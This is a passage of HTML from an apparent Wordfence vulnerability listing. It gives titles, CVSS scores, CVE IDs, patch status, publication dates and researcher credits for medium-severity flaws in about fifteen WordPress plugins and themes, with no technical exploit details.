<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39bcc1af-0315-44e0-864a-4105cedd216c" target="_blank" rel="noopener">Charitable – Donation &amp; Fundraising Platform (Donation Forms, Recurring Donations &amp; Fundraising Campaigns) &lt;= 1.8.11.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73994" target="_blank" rel="noopener noreferrer">							CVE-2026-73994						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/charitable" target="_blank" rel="noopener">Charitable – Donation &amp; Fundraising Platform (Donation Forms, Recurring Donations &amp; Fundraising Campaigns)</a> <span class="wfvr-software-slug">[charitable]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39bcc1af-0315-44e0-864a-4105cedd216c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa85e614-b0e0-4d54-a9f0-27c99e898b7d" target="_blank" rel="noopener">Contact Form by Supsystic &lt; 1.10.0 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73379" target="_blank" rel="noopener noreferrer">							CVE-2026-73379						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-by-supsystic" target="_blank" rel="noopener">Contact Form by Supsystic</a> <span class="wfvr-software-slug">[contact-form-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa85e614-b0e0-4d54-a9f0-27c99e898b7d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50070f1f-c639-44a7-bada-577bf88c85db" target="_blank" rel="noopener">Duitku Payment Gateway &lt;= 2.11.14 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32468" target="_blank" rel="noopener noreferrer">							CVE-2026-32468						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duitku-social-payment-gateway" target="_blank" rel="noopener">Duitku Payment Gateway</a> <span class="wfvr-software-slug">[duitku-social-payment-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50070f1f-c639-44a7-bada-577bf88c85db" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f1e5438f-1309-4d39-a9b4-cda27b652d93" target="_blank" rel="noopener">E-cab Taxi Booking Manager for Woocommerce &lt; 2.0.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73363" target="_blank" rel="noopener noreferrer">							CVE-2026-73363						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ecab-taxi-booking-manager" target="_blank" rel="noopener">E-cab Taxi Booking Manager for Woocommerce</a> <span class="wfvr-software-slug">[ecab-taxi-booking-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/van-phuc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd0fc66ed35d563ddd76a2843e23fd05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd0fc66ed35d563ddd76a2843e23fd05"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/van-phuc" target="_blank" rel="noopener">Van Phuc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f1e5438f-1309-4d39-a9b4-cda27b652d93" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/030bb667-b8e6-4987-8af2-83cfa4bed8a6" target="_blank" rel="noopener">EPROLO-Dropshipping &lt;= 2.4.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74019" target="_blank" rel="noopener noreferrer">							CVE-2026-74019						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eprolo-dropshipping" target="_blank" rel="noopener">EPROLO-Dropshipping</a> <span class="wfvr-software-slug">[eprolo-dropshipping]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ee838051f5b349d62b3dc49551eb17c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ee838051f5b349d62b3dc49551eb17c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener">hivesec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/030bb667-b8e6-4987-8af2-83cfa4bed8a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f30810d4-415c-4001-919d-eac753715474" target="_blank" rel="noopener">Estatik Real Estate Plugin &lt; 4.3.4 &#8211; Unauthenticated Mail Relay</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18044" target="_blank" rel="noopener noreferrer">							CVE-2026-18044						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/estatik" target="_blank" rel="noopener">Estatik Real Estate Plugin</a> <span class="wfvr-software-slug">[estatik]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f30810d4-415c-4001-919d-eac753715474" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08066126-95d6-4112-8635-5f45ed5af678" target="_blank" rel="noopener">Extra Product Options Builder for WooCommerce &lt; 1.2.176 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19728" target="_blank" rel="noopener noreferrer">							CVE-2026-19728						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/additional-product-fields-for-woocommerce" target="_blank" rel="noopener">Extra Product Options Builder for WooCommerce</a> <span class="wfvr-software-slug">[additional-product-fields-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0da320f0ff233e1fc5948be78c4a9693.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0da320f0ff233e1fc5948be78c4a9693"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08066126-95d6-4112-8635-5f45ed5af678" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee5ebdbf-2ea6-4d0c-adb3-af1ea53cda68" target="_blank" rel="noopener">Flutterwave WooCommerce &lt;= 3.3.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73399" target="_blank" rel="noopener noreferrer">							CVE-2026-73399						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rave-woocommerce-payment-gateway" target="_blank" rel="noopener">Flutterwave WooCommerce</a> <span class="wfvr-software-slug">[rave-woocommerce-payment-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee5ebdbf-2ea6-4d0c-adb3-af1ea53cda68" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b2e9103-16a8-4350-97ee-ae05a90850f6" target="_blank" rel="noopener">kk Star Ratings &lt;= 5.4.10.3 &#8211; Unauthenticated Arbitrary Shortcode Execution via &#8216;payload&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3424" target="_blank" rel="noopener noreferrer">							CVE-2026-3424						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kk-star-ratings" target="_blank" rel="noopener">kk Star Ratings – Rate Post &amp; Collect User Feedbacks</a> <span class="wfvr-software-slug">[kk-star-ratings]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ronnachai-sretawat-na-ayutaya-simonhaskelly" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5b69e7aafee24f8ccab8f74d57deb0f8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5b69e7aafee24f8ccab8f74d57deb0f8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ronnachai-sretawat-na-ayutaya-simonhaskelly" target="_blank" rel="noopener">Ronnachai Sretawat Na Ayutaya (Simonhaskelly)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b2e9103-16a8-4350-97ee-ae05a90850f6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd4714d1-3824-4436-bca0-f4eb6b11830c" target="_blank" rel="noopener">Koji &lt;= 2.2.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74020" target="_blank" rel="noopener noreferrer">							CVE-2026-74020						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/koji" target="_blank" rel="noopener">Koji</a> <span class="wfvr-software-slug">[koji]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener">Trương Hữu Phúc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd4714d1-3824-4436-bca0-f4eb6b11830c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0760bc9f-0f02-47fd-9865-d9d269a69778" target="_blank" rel="noopener">Membership For WooCommerce &lt; 3.1.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19709" target="_blank" rel="noopener noreferrer">							CVE-2026-19709						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/membership-for-woocommerce" target="_blank" rel="noopener">Membership For WooCommerce</a> <span class="wfvr-software-slug">[membership-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0760bc9f-0f02-47fd-9865-d9d269a69778" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/41a2d4db-3032-476f-91d0-c4b6dcbc61e7" target="_blank" rel="noopener">MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions &lt;= 5.0.14 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66651" target="_blank" rel="noopener noreferrer">							CVE-2026-66651						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</a> <span class="wfvr-software-slug">[dc-woocommerce-multi-vendor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/41a2d4db-3032-476f-91d0-c4b6dcbc61e7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af40f0e4-96cf-4eac-842b-6df6279cab44" target="_blank" rel="noopener">New User Approve &lt;= 3.2.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28163" target="_blank" rel="noopener noreferrer">							CVE-2026-28163						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/new-user-approve" target="_blank" rel="noopener">New User Approve</a> <span class="wfvr-software-slug">[new-user-approve]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af40f0e4-96cf-4eac-842b-6df6279cab44" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cac5f723-f273-4c19-83ff-9110ec4f86a5" target="_blank" rel="noopener">Notification Master – Real-Time WordPress Notifications With Email, SMS, Webhooks &amp; More &lt;= 1.7.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28153" target="_blank" rel="noopener noreferrer">							CVE-2026-28153						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/notification-master" target="_blank" rel="noopener">Notification Master – Real-Time WordPress Notifications With Email, SMS, Webhooks &amp; More</a> <span class="wfvr-software-slug">[notification-master]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ian-ho-shim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/32a3a52076160853e8b6770c359d720d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="32a3a52076160853e8b6770c359d720d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ian-ho-shim" target="_blank" rel="noopener">Ian Ho Shim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cac5f723-f273-4c19-83ff-9110ec4f86a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
